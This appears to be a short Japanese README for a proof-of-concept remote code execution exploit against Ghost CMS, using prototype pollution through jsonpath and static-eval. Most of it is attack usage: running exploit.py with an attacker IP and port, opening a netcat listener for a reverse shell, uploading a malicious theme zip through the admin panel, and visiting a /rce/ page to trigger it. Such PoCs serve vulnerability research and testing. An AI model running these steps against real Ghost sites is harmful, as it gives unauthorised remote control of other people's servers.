
Ghost CMSのプロトタイプ汚染(jsonpathおよびstatic-eval経由)によるリモートコード実行の概念実証エクスプロイト。脆弱な環境のセットアップと使用方法を含む。
Ghost CMS における jsonpath/static-eval プロトタイプチェーンを介した RCE。
cd build
./build.sh
python3 exploit.py -i <YOUR_IP> -p <PORT>
nc -lvnp <PORT>malicious-theme.zip を Ghost Admin → Settings → Design にアップロードrce のページを作成/rce/ にアクセス